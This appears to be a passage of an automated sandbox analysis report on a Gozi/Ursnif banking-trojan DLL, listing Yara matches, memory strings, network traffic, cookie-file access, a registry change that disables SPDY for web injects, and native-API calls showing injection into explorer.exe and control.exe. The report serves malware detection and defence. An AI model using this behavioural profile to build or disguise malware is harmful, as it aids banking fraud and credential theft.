Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 0000001E.00000002.507964671.0000027467821000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001E.00000002.507964671.0000027467821000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001E.00000002.507964671.0000027467821000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001E.00000002.487850335.00000274579D0000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001E.00000002.507964671.0000027467821000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000026.00000002.628178398.00000000053A0000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 00000026.00000000.472927251.0000000008B68000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpMSN
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49736 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.362515361.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.475600162.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362460411.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.456841690.0000000000470000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362409571.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.398940574.0000000004C6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.464100297.000002179E910000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.473286008.0000000002AD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.629508039.000000000679E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362501622.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362480640.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362433705.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362526268.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.454805795.000002746FF10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.622819473.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362379436.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.477760036.000000000089E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5292, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5720, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY

E-Banking Fraud:

barindex
Detected Gozi e-Banking trojan
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 1_2_00A55ECA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 1_2_00A55ECA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 1_2_00A55ECA
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.362515361.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.475600162.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362460411.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.456841690.0000000000470000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362409571.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.398940574.0000000004C6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.464100297.000002179E910000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.473286008.0000000002AD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.629508039.000000000679E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362501622.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362480640.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362433705.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362526268.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.454805795.000002746FF10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.622819473.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362379436.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.477760036.000000000089E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5292, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5720, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000027.00000003.464100297.000002179E910000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000026.00000003.473286008.0000000002AD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000026.00000002.629508039.000000000679E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000001E.00000003.454805795.000002746FF10000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000026.00000002.622819473.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000027.00000002.477760036.000000000089E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A66CBC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 1_2_00A66CBC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6AC94 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 1_2_00A6AC94
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A5ACD5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_00A5ACD5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A5A027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 1_2_00A5A027
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A5E010 GetProcAddress,NtCreateSection,memset, 1_2_00A5E010
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A59DAC NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_00A59DAC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6CD7A NtQueryInformationProcess, 1_2_00A6CD7A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A67579 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset, 1_2_00A67579
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A67AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 1_2_00A67AFF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A57E14 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 1_2_00A57E14
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A747A1 NtMapViewOfSection, 1_2_00A747A1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A537E7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_00A537E7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A640A7 memset,NtQueryInformationProcess, 1_2_00A640A7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A64C67 NtGetContextThread,RtlNtStatusToDosError, 1_2_00A64C67
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A57878 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 1_2_00A57878
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A7298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 1_2_00A7298D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A545FF OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 1_2_00A545FF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6956E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 1_2_00A6956E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A61606 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_00A61606
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A5AA15 NtQuerySystemInformation,RtlNtStatusToDosError, 1_2_00A5AA15
Source: C:\Windows\explorer.exe Code function: 38_2_03B5B980 NtMapViewOfSection, 38_2_03B5B980
Source: C:\Windows\explorer.exe Code function: 38_2_03B7D9EC NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose, 38_2_03B7D9EC
Source: C:\Windows\explorer.exe Code function: 38_2_03B569DC RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 38_2_03B569DC
Source: C:\Windows\explorer.exe Code function: 38_2_03B51148 NtCreateSection, 38_2_03B51148
Source: C:\Windows\explorer.exe Code function: 38_2_03B61084 NtQueryInformationProcess, 38_2_03B61084
Source: C:\Windows\explorer.exe Code function: 38_2_03B6F0D0 NtReadVirtualMemory, 38_2_03B6F0D0
Source: C:\Windows\explorer.exe Code function: 38_2_03B63EF4 NtQuerySystemInformation, 38_2_03B63EF4
Source: C:\Windows\explorer.exe Code function: 38_2_03B746EC NtAllocateVirtualMemory, 38_2_03B746EC
Source: C:\Windows\explorer.exe Code function: 38_2_03B57DA0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 38_2_03B57DA0
Source: C:\Windows\explorer.exe Code function: 38_2_03B71DF4 NtWriteVirtualMemory, 38_2_03B71DF4
Source: C:\Windows\explorer.exe Code function: 38_2_03B91004 NtProtectVirtualMemory,NtProtectVirtualMemory, 38_2_03B91004
Source: C:\Windows\System32\control.exe Code function: 39_2_00871084 NtQueryInformationProcess, 39_2_00871084
Source: C:\Windows\System32\control.exe Code function: 39_2_008840A4 NtQueryInformationProcess, 39_2_008840A4
Source: C:\Windows\System32\control.exe Code function: 39_2_0087F0D0 NtReadVirtualMemory, 39_2_0087F0D0
Source: C:\Windows\System32\control.exe Code function: 39_2_0086B980 NtMapViewOfSection, 39_2_0086B980
Source: C:\Windows\System32\control.exe Code function: 39_2_008669DC RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 39_2_008669DC
Source: C:\Windows\System32\control.exe Code function: 39_2_0088D9EC NtQueryInformationToken,NtQueryInformationToken,NtClose, 39_2_0088D9EC
Source: C:\Windows\System32\control.exe Code function: 39_2_00861148 NtCreateSection, 39_2_00861148
Source: C:\Windows\System32\control.exe Code function: 39_2_00867DA0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 39_2_00867DA0
Source: C:\Windows\System32\control.exe Code function: 39_2_00881DF4 NtWriteVirtualMemory, 39_2_00881DF4
Source: C:\Windows\System32\control.exe Code function: 39_2_008846EC NtAllocateVirtualMemory, 39_2_008846EC
Source: C:\Windows\System32\control.exe Code function: 39_2_008A1004 NtProtectVirtualMemory,NtProtectVirtualMemory, 39_2_008A1004
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A71CB8 CreateProcessAsUserA, 1_2_00A71CB8
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A648AD 1_2_00A648AD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A5D0DC 1_2_00A5D0DC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A54C03 1_2_00A54C03
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6D057 1_2_00A6D057
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6ED4B 1_2_00A6ED4B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A73EAF 1_2_00A73EAF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A562FA 1_2_00A562FA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6D7BD 1_2_00A6D7BD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A5E384 1_2_00A5E384
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A68BF3 1_2_00A68BF3
Source: C:\Windows\explorer.exe Code function: 38_2_03B793FC 38_2_03B793FC
Source: C:\Windows\explorer.exe Code function: 38_2_03B74B78 38_2_03B74B78
Source: C:\Windows\explorer.exe Code function: 38_2_03B5DA3C 38_2_03B5DA3C
Source: C:\Windows\explorer.exe Code function: 38_2_03B6AA28 38_2_03B6AA28
Source: C:\Windows\explorer.exe Code function: 38_2_03B5B9E8 38_2_03B5B9E8
Source: C:\Windows\explorer.exe Code function: 38_2_03B569DC 38_2_03B569DC
Source: C:\Windows\explorer.exe Code function: 38_2_03B6D92C 38_2_03B6D92C
Source: C:\Windows\explorer.exe Code function: 38_2_03B6B814 38_2_03B6B814
Source: C:\Windows\explorer.exe Code function: 38_2_03B7A074 38_2_03B7A074
Source: C:\Windows\explorer.exe Code function: 38_2_03B5DF58 38_2_03B5DF58
Source: C:\Windows\explorer.exe Code function: 38_2_03B5ECE0 38_2_03B5ECE0
Source: C:\Windows\explorer.exe Code function: 38_2_03B75428 38_2_03B75428
Source: C:\Windows\explorer.exe Code function: 38_2_03B7A3B2 38_2_03B7A3B2
Source: C:\Windows\explorer.exe Code function: 38_2_03B703EC 38_2_03B703EC
Source: C:\Windows\explorer.exe Code function: 38_2_03B66B00 38_2_03B66B00
Source: C:\Windows\explorer.exe Code function: 38_2_03B6B378 38_2_03B6B378
Source: C:\Windows\explorer.exe Code function: 38_2_03B57B44 38_2_03B57B44
Source: C:\Windows\explorer.exe Code function: 38_2_03B5E2B0 38_2_03B5E2B0
Source: C:\Windows\explorer.exe Code function: 38_2_03B52A34 38_2_03B52A34
Source: C:\Windows\explorer.exe Code function: 38_2_03B59A34 38_2_03B59A34
Source: C:\Windows\explorer.exe Code function: 38_2_03B7E220 38_2_03B7E220
Source: C:\Windows\explorer.exe Code function: 38_2_03B67218 38_2_03B67218
Source: C:\Windows\explorer.exe Code function: 38_2_03B8027C 38_2_03B8027C
Source: C:\Windows\explorer.exe Code function: 38_2_03B76250 38_2_03B76250
Source: C:\Windows\explorer.exe Code function: 38_2_03B7EA40 38_2_03B7EA40
Source: C:\Windows\explorer.exe Code function: 38_2_03B719FC 38_2_03B719FC
Source: C:\Windows\explorer.exe Code function: 38_2_03B7A9FC 38_2_03B7A9FC
Source: C:\Windows\explorer.exe Code function: 38_2_03B699F8 38_2_03B699F8
Source: C:\Windows\explorer.exe Code function: 38_2_03B549C4 38_2_03B549C4
Source: C:\Windows\explorer.exe Code function: 38_2_03B5596C 38_2_03B5596C
Source: C:\Windows\explorer.exe Code function: 38_2_03B6A0F0 38_2_03B6A0F0
Source: C:\Windows\explorer.exe Code function: 38_2_03B6782C 38_2_03B6782C
Source: C:\Windows\explorer.exe Code function: 38_2_03B69850 38_2_03B69850
Source: C:\Windows\explorer.exe Code function: 38_2_03B6CE90 38_2_03B6CE90
Source: C:\Windows\explorer.exe Code function: 38_2_03B596D8 38_2_03B596D8
Source: C:\Windows\explorer.exe Code function: 38_2_03B80614 38_2_03B80614
Source: C:\Windows\explorer.exe Code function: 38_2_03B51600 38_2_03B51600
Source: C:\Windows\explorer.exe Code function: 38_2_03B625A4 38_2_03B625A4
Source: C:\Windows\explorer.exe Code function: 38_2_03B55DA8 38_2_03B55DA8
Source: C:\Windows\explorer.exe Code function: 38_2_03B68DD0 38_2_03B68DD0
Source: C:\Windows\explorer.exe Code function: 38_2_03B565D8 38_2_03B565D8
Source: C:\Windows\explorer.exe Code function: 38_2_03B675D8 38_2_03B675D8
Source: C:\Windows\explorer.exe Code function: 38_2_03B66528 38_2_03B66528
Source: C:\Windows\explorer.exe Code function: 38_2_03B7C560 38_2_03B7C560
Source: C:\Windows\explorer.exe Code function: 38_2_03B77D44 38_2_03B77D44
Source: C:\Windows\explorer.exe Code function: 38_2_03B5FCA0 38_2_03B5FCA0
Source: C:\Windows\explorer.exe Code function: 38_2_03B61C0C 38_2_03B61C0C
Source: C:\Windows\explorer.exe Code function: 38_2_03B9138C 38_2_03B9138C
Source: C:\Windows\System32\control.exe Code function: 39_2_008669DC 39_2_008669DC
Source: C:\Windows\System32\control.exe Code function: 39_2_00884B78 39_2_00884B78
Source: C:\Windows\System32\control.exe Code function: 39_2_00885428 39_2_00885428
Source: C:\Windows\System32\control.exe Code function: 39_2_0087A0F0 39_2_0087A0F0
Source: C:\Windows\System32\control.exe Code function: 39_2_0087B814 39_2_0087B814
Source: C:\Windows\System32\control.exe Code function: 39_2_0087782C 39_2_0087782C
Source: C:\Windows\System32\control.exe Code function: 39_2_00879850 39_2_00879850
Source: C:\Windows\System32\control.exe Code function: 39_2_0088A074 39_2_0088A074
Source: C:\Windows\System32\control.exe Code function: 39_2_008649C4 39_2_008649C4
Source: C:\Windows\System32\control.exe Code function: 39_2_0086B9E8 39_2_0086B9E8
Source: C:\Windows\System32\control.exe Code function: 39_2_008819FC 39_2_008819FC
Source: C:\Windows\System32\control.exe Code function: 39_2_0088A9FC 39_2_0088A9FC
Source: C:\Windows\System32\control.exe Code function: 39_2_008799F8 39_2_008799F8
Source: C:\Windows\System32\control.exe Code function: 39_2_0087D92C 39_2_0087D92C
Source: C:\Windows\System32\control.exe Code function: 39_2_0086596C 39_2_0086596C
Source: C:\Windows\System32\control.exe Code function: 39_2_00877218 39_2_00877218
Source: C:\Windows\System32\control.exe Code function: 39_2_0088E220 39_2_0088E220
Source: C:\Windows\System32\control.exe Code function: 39_2_0087AA28 39_2_0087AA28
Source: C:\Windows\System32\control.exe Code function: 39_2_00869A34 39_2_00869A34
Source: C:\Windows\System32\control.exe Code function: 39_2_00862A34 39_2_00862A34
Source: C:\Windows\System32\control.exe Code function: 39_2_0086DA3C 39_2_0086DA3C
Source: C:\Windows\System32\control.exe Code function: 39_2_0088EA40 39_2_0088EA40
Source: C:\Windows\System32\control.exe Code function: 39_2_00886250 39_2_00886250
Source: C:\Windows\System32\control.exe Code function: 39_2_0089027C 39_2_0089027C
Source: C:\Windows\System32\control.exe Code function: 39_2_0088A3B2 39_2_0088A3B2
Source: C:\Windows\System32\control.exe Code function: 39_2_008803EC 39_2_008803EC
Source: C:\Windows\System32\control.exe Code function: 39_2_008893FC 39_2_008893FC
Source: C:\Windows\System32\control.exe Code function: 39_2_00876B00 39_2_00876B00
Source: C:\Windows\System32\control.exe Code function: 39_2_00867B44 39_2_00867B44
Source: C:\Windows\System32\control.exe Code function: 39_2_0087B378 39_2_0087B378
Source: C:\Windows\System32\control.exe Code function: 39_2_0086FCA0 39_2_0086FCA0
Source: C:\Windows\System32\control.exe Code function: 39_2_0086ECE0 39_2_0086ECE0
Source: C:\Windows\System32\control.exe Code function: 39_2_00871C0C 39_2_00871C0C
Source: C:\Windows\System32\control.exe Code function: 39_2_008725A4 39_2_008725A4
Source: C:\Windows\System32\control.exe Code function: 39_2_00865DA8 39_2_00865DA8
Source: C:\Windows\System32\control.exe Code function: 39_2_00878DD0 39_2_00878DD0
Source: C:\Windows\System32\control.exe Code function: 39_2_008665D8 39_2_008665D8
Source: C:\Windows\System32\control.exe Code function: 39_2_008775D8 39_2_008775D8
Source: C:\Windows\System32\control.exe Code function: 39_2_00876528 39_2_00876528
Source: C:\Windows\System32\control.exe Code function: 39_2_00887D44 39_2_00887D44
Source: C:\Windows\System32\control.exe Code function: 39_2_0088C560 39_2_0088C560
Source: C:\Windows\System32\control.exe Code function: 39_2_0087CE90 39_2_0087CE90
Source: C:\Windows\System32\control.exe Code function: 39_2_008696D8 39_2_008696D8
Source: C:\Windows\System32\control.exe Code function: 39_2_00861600 39_2_00861600
Source: C:\Windows\System32\control.exe Code function: 39_2_00890614 39_2_00890614
Source: C:\Windows\System32\control.exe Code function: 39_2_0086DF58 39_2_0086DF58
PE file contains executable resources (Code or Archives)
Source: crypt_3300.dll Static PE information: Resource name: RT_VERSION type: COM executable for DOS
PE file does not import any functions
Source: rgcvdt5c.dll.36.dr Static PE information: No import functions for PE file found
Source: czjkgrnh.dll.33.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: lz32.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: cryptdlg.dll
Uses 32bit PE files
Source: crypt_3300.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Yara signature match
Source: 00000027.00000003.464100297.000002179E910000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000026.00000003.473286008.0000000002AD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000026.00000002.629508039.000000000679E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000001E.00000003.454805795.000002746FF10000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000026.00000002.622819473.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
